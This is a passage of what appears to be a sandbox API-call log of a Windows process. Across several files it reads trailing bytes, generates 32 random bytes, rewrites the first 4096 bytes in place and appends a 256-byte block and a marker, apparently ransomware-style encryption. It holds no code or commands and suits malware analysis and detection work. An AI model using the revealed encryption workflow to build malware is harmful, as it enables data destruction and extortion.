(in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.974] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.974] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.975] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.975] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.976] GetProcessHeap () returned 0x4f10000 [0078.976] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0078.977] SetFilePointerEx (in: hFile=0x818, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x818, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.977] WriteFile (in: hFile=0x818, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0078.977] GetProcessHeap () returned 0x4f10000 [0078.977] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0078.977] CloseHandle (hObject=0x818) returned 1 [0078.979] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 39 [0078.979] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.979] ReadFile (in: hFile=0x81c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.979] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.979] GetProcessHeap () returned 0x4f10000 [0078.979] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.979] GetProcessHeap () returned 0x4f10000 [0078.979] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0078.979] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0078.979] GetProcessHeap () returned 0x4f10000 [0078.979] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0078.979] ReadFile (in: hFile=0x81c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.027] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.027] WriteFile (in: hFile=0x81c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.027] GetProcessHeap () returned 0x4f10000 [0079.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.027] GetProcessHeap () returned 0x4f10000 [0079.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.027] GetProcessHeap () returned 0x4f10000 [0079.027] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.027] GetProcessHeap () returned 0x4f10000 [0079.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.027] GetProcessHeap () returned 0x4f10000 [0079.028] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.028] GetProcessHeap () returned 0x4f10000 [0079.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.029] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0079.029] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.030] GetProcessHeap () returned 0x4f10000 [0079.030] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0079.031] GetProcessHeap () returned 0x4f10000 [0079.032] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0079.032] SetFilePointerEx (in: hFile=0x81c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.032] WriteFile (in: hFile=0x81c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.032] WriteFile (in: hFile=0x81c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0079.032] GetProcessHeap () returned 0x4f10000 [0079.032] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0079.032] CloseHandle (hObject=0x81c) returned 1 [0079.034] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 40 [0079.034] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.034] ReadFile (in: hFile=0x820, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0079.034] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.034] GetProcessHeap () returned 0x4f10000 [0079.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0079.034] GetProcessHeap () returned 0x4f10000 [0079.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0079.034] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0079.034] GetProcessHeap () returned 0x4f10000 [0079.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0079.034] ReadFile (in: hFile=0x820, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0079.197] SetFilePointerEx (in: hFile=0x820, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.197] WriteFile (in: hFile=0x820, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0079.198] GetProcessHeap () returned 0x4f10000 [0079.198] HeapFree (in: 